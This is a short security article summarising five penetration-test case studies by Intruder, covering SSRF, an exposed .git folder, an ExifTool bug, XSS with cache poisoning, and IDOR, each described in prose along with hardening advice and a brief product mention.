How Small Vulnerabilities Trigger Big Breaches – Five Lessons from the Front Line
A research team from Intruder dissected five real-world security incidents to show how seemingly “low-risk” flaws can snowball into full-scale breaches:
1. SSRF → AWS credential theft – an application followed a 302 redirect to the EC2 metadata service, leaking cloud keys.
2. Exposed .git repo → SQL injection – mis-placed source code revealed an auth bypass that ultimately granted database access.
3. ExifTool PDF bug → remote code execution – an out-of-date library let attackers run commands on the host server.
4. Self-XSS + cache poisoning → site-wide account takeover – two “minor” bugs combined to hijack every user session.
5. IDOR → mass data leakage – simply changing an ID in an API call exposed CVs, orders and user profiles.
Intruder argues that continuous external-asset discovery and prompt hardening (e.g., enforcing AWS IMDSv2, hiding .git, patching libraries) would have broken each attack chain before real damage occurred.
Cyber attackers rarely kick in the front door; instead, they exploit overlooked gaps and chain them together. Recent findings from the penetration-testing team at Intruder reveal how modest bugs can escalate into headline-grabbing incidents.
1. A Redirect That Stole the Cloud
A routine webhook in a home-moving app dutifully followed a 302 redirect—straight to AWS metadata. In seconds the service logged temporary credentials, handing would-be intruders the keys to the cloud. Enforcing IMDS v2 would have slammed that door shut.
2. When a .git Folder Leads to a University’s Database
An exposed .git repository unveiled source code, an authentication bypass and then a blind SQL-injection flaw. One casual mis-configuration snowballed into access to thousands of student records.
3. Out-of-Date Library, Full Remote Control
A document-signing platform leaked that it used ExifTool. The version still harboured CVE-2021-22204. A tainted PDF gave testers remote command execution and, with a little pivoting, potential root access.
4. Self-XSS? Harmless—Until It Isn’t
On an auction site, a self-XSS in a header seemed low impact. Combine it with cache-poisoning, however, and every visitor received the payload automatically, allowing wholesale account takeover.
5. Change One Number, Download Everything
Classic IDOR: tweak an identifier in an API call and you can read someone else’s CV, order or profile. The testers harvested thousands of private records in minutes.
Stop Breaches Before They Start
The pattern is clear: map what’s exposed, patch quickly and block attackers from joining the dots. Continuous discovery and scanning platforms—Intruder is one example—flag mis-configurations such as exposed metadata services or forgotten sub-domains before criminals do.